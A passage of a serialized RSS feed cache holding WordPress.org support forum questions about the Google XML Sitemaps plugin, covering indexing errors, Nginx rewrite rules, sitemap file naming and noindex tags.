+0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:567:\"\n						\n						<p>Replies: 0</p>\n						<p>The site cannot be edited by administrator due to this error:<br />\nUse of undefined constant ddsg_language â€“ assumed â€˜ddsg_languageâ€™ (this will throw an Error in a future version of PHP) in /home/careers/public_html/wp-content/plugins/sitemap-generator/sitemap-generator.php on line 45</p>\n<p>THis appears as a warning, but no editing of the site can occur.</p>\n<p>I am not the site developer and, because I can&#8217;t login as admin, I&#8217;m not sure which sitemap generator plugin is being used.  </p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"skcombs\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:106:\"https://wordpress.org/support/topic/google-search-results-shows-date-in-breakdcrumb-instead-of-categories/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"Google Search Results shows date in breakdcrumb instead of categories\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:106:\"https://wordpress.org/support/topic/google-search-results-shows-date-in-breakdcrumb-instead-of-categories/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 27 Oct 2019 15:30:55 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:187:\"\n						\n						<p>Replies: 0</p>\n						<p>All my google search results now show dates instead of categories in breadcrumb. Let me know what changes i need to make for this</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"hisureshkumar\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"https://wordpress.org/support/topic/media-blocked-by-robots-txt/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"Media blocked by robots.txt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"https://wordpress.org/support/topic/media-blocked-by-robots-txt/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 26 Oct 2019 08:59:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:377:\"\n						\n						<p>Replies: 2</p>\n						<p>When i am trying to fetch any media file in Google Search Console it showing me the errors like &#8220;Blocked by robots.txt&#8221;.</p>\n<p>It is not indexing any media file like image, pdf and others. I already allowed wp -content/uploads in the robots.txt but still not works.</p>\n<p>Hoping to get solution from here.</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Mohsin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"https://wordpress.org/support/topic/urls-changed-to-page-id-after-installation/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"URLs changed to page id after installation\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"https://wordpress.org/support/topic/urls-changed-to-page-id-after-installation/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 24 Oct 2019 09:31:42 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:297:\"\n						\n						<p>Replies: 0</p>\n						<p>Hi there,</p>\n<p>After installing google xml sitemap plugin I noticed that all the page URLs have changed to page IDs &#8211; I&#8217;ve double-checked all the settings but can&#8217;t see where I can revert back?</p>\n<p>Thanks in advance.</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"charlixcx\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"https://wordpress.org/support/topic/most-links-in-a-weird-file/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"Most links in a weird file!\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"https://wordpress.org/support/topic/most-links-in-a-weird-file/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 23 Oct 2019 09:42:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:764:\"\n						\n						<p>Replies: 0</p>\n						<p>Hi,</p>\n<p>I have a very small brochure site with 4 pages, in English, super simple: /contact /privacy etc.</p>\n<p>On sitemap.xml it just includes a link to one file:</p>\n<p>sitemap-pt-page-2018-04.xml</p>\n<p>And then, on that file, it lists the 4 pages perfectly.</p>\n<p>So, there is no &#8220;error&#8221; in the sense that, everything works. But, for the life of me, I can&#8217;t figure out why it&#8217;s putting all the links onto a &#8220;pt&#8221; page nor a page with that month timestamp. There&#8217;s no Portuguese, there are no blog posts nor articles nor categories from then!</p>\n<p>Why could this happen? And is there a way around it, like to force a filename or something?</p>\n<p>Thank you</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"citywanderer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://wordpress.org/support/topic/homepage-to-be-included-in-sitemap/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"Homepage to be included in sitemap\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://wordpress.org/support/topic/homepage-to-be-included-in-sitemap/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 23 Oct 2019 06:04:13 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:271:\"\n						\n						<p>Replies: 0</p>\n						<p>Hello, how do i include my homepage in sitemap. Each time i tried to index my homepage on google sitemap, this is the respond i get under Coverage &#8220;Indexed, not submitted in sitemap&#8221; Please help me out</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"tchange\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"https://wordpress.org/support/topic/google-sitemap-entries-limit-per-sitemap/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"google sitemap ENTRIES LIMIT per sitemap\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"https://wordpress.org/support/topic/google-sitemap-entries-limit-per-sitemap/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 20 Oct 2019 11:45:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:389:\"\n						\n						<p>Replies: 0</p>\n						<p>Hello, </p>\n<p>so Yoast has this function:<br />\n<em>function max_entries_per_sitemap() { return 100;}<br />\nadd_filter( &#8216;wpseo_sitemap_entries_per_page&#8217;, &#8216;max_entries_per_sitemap&#8217; );</em></p>\n<p>How can I solve &#8220;Google XML sitemap&#8221; entry limit problem, need reduce to 100 entries per sitemap???</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"appmarsh\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"https://wordpress.org/support/topic/sitemap-homepage-url/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"Sitemap homepage URL\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"https://wordpress.org/support/topic/sitemap-homepage-url/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 17 Oct 2019 13:53:55 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:549:\"\n						\n						<p>Replies: 0</p>\n						<p>Hello &#8211; </p>\n<p>Within my sitemap, the homepage is displaying some sort of &#8220;name&#8221; (sitemap-pt-page-2019-10):</p>\n<p><a href=\"https://sitename.com/testsite/sitemap-pt-page-2019-10.xml\" rel=\"nofollow\">https://sitename.com/testsite/sitemap-pt-page-2019-10.xml</a></p>\n<p>But, I would prefer it to just list the root directory (/) since its the homepage:</p>\n<p><a href=\"https://sitename.com/testsite/\" rel=\"nofollow\">https://sitename.com/testsite/</a></p>\n<p>Is that possible?</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"mcvetyty\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/support/topic/404-on-nginx-server/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"404 on NGINX SERVER\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/support/topic/404-on-nginx-server/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 16 Oct 2019 21:59:39 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:929:\"\n						\n						<p>Replies: 6</p>\n						<p>I&#8217;m getting 404 error, since my website uses NGINX. So It shows the message:</p>\n<p>&#8220;Since you are using Nginx as your web-server, please configure the following rewrite rules in case you get 404 Not Found errors for your sitemap:&#8221;</p>\n<blockquote><p>\nrewrite ^/sitemap(-+([a-zA-Z0-9_-]+))?\\.xml$ &#8220;/index.php?xml_sitemap=params=$2&#8221; last;<br />\nrewrite ^/sitemap(-+([a-zA-Z0-9_-]+))?\\.xml\\.gz$ &#8220;/index.php?xml_sitemap=params=$2;zip=true&#8221; last;<br />\nrewrite ^/sitemap(-+([a-zA-Z0-9_-]+))?\\.html$ &#8220;/index.php?xml_sitemap=params=$2;html=true&#8221; last;<br />\nrewrite ^/sitemap(-+([a-zA-Z0-9_-]+))?\\.html.gz$ &#8220;/index.php?xml_sitemap=params=$2;html=true;zip=true&#8221; last;\n</p></blockquote>\n<p>But I dont even know where to insert all that stuff, what file? Where is that file located? Can you help me on this please?</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"hdeveza\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"https://wordpress.org/support/topic/coverage-issue-detected-in-google-webmaster-console/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"Coverage Issue Detected in Google Webmaster Console\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"https://wordpress.org/support/topic/coverage-issue-detected-in-google-webmaster-console/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 13 Oct 2019 08:02:55 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1463:\"\n						\n						<p>Replies: 7</p>\n						<p>Hi,</p>\n<p>Urgent issue. </p>\n<p>When will this plugin be updated? Apparently, my sites using this plugin that have been submitted into Google Webmaster Console are having a &#8220;Coverage Issue&#8221;, and the URL that Google shows me as having a &#8220;Noindex&#8221; tag is the&#8230;&#8230;</p>\n<p>Sitemap.html</p>\n<p>And apparently, this was first detected back in April 27, 2019.</p>\n<p>Which corresponds to the last update of this plugin. And since then, it has not been updated, and probably this is the reason why this new error is being shown by Google.</p>\n<p>Can the author respond to this and address the &#8220;NoIndex&#8221; issue?</p>\n<p>If I look at the first line of the sitemap that the plugin generates, it shows this line: </p>\n<p><code>&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot; xmlns:html=&quot;http://www.w3.org/TR/REC-html40&quot; xmlns:sitemap=&quot;http://www.sitemaps.org/schemas/sitemap/0.9&quot;&gt;&lt;head&gt;&lt;title&gt;XML Sitemap&lt;/title&gt;&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot;/&gt;&lt;meta name=&quot;robots&quot; content=&quot;noindex,follow&quot;/&gt;&lt;style type=&quot;text/css&quot;&gt;</code></p>\n<p>Notice the &#8220;noindex&#8221; in there? I think Google has maybe changed their understanding of &#8220;noindex&#8221; and therefore, the plugin should remove this &#8220;noindex&#8221; tag.</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Bliss7\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:99:\"https://wordpress.org/support/topic/how-to-input-new-url-into-search-console-after-plugin-download/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"How to Input new URL into Search console after plugin download\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:99:\"https://wordpress.org/support/topic/how-to-input-new-url-into-search-console-after-plugin-download/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 11 Oct 2019 14:13:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:444:\"\n						\n						<p>Replies: 1</p>\n						<p>Hello, I just downloaded the Google sitemaps plugin because I had an HTML error when I tried inputting my URL into google search console site maps page. Now, I have the plugin so I should be covered, but what URL should I input into the google search console now so I can keep up with my site dynamics? Hopefully that makes sense, if not please let me know!</p>\n<p>Thanks</p>\n<p>Michael</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"murdy\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"https://wordpress.org/support/topic/image-sitemap-5/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Image sitemap?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"https://wordpress.org/support/topic/image-sitemap-5/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 11 Oct 2019 00:13:46 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:157:\"\n						\n						<p>Replies: 0</p>\n						<p>Hi<br />\nThanks for such great plugin!<br />\nDoes it allow to create an image sitemap?<br />\nthanks</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"teacdan\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"https://wordpress.org/support/topic/bug-google-xml-sitemaps-sitemap-pt-page/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"bug Google XML 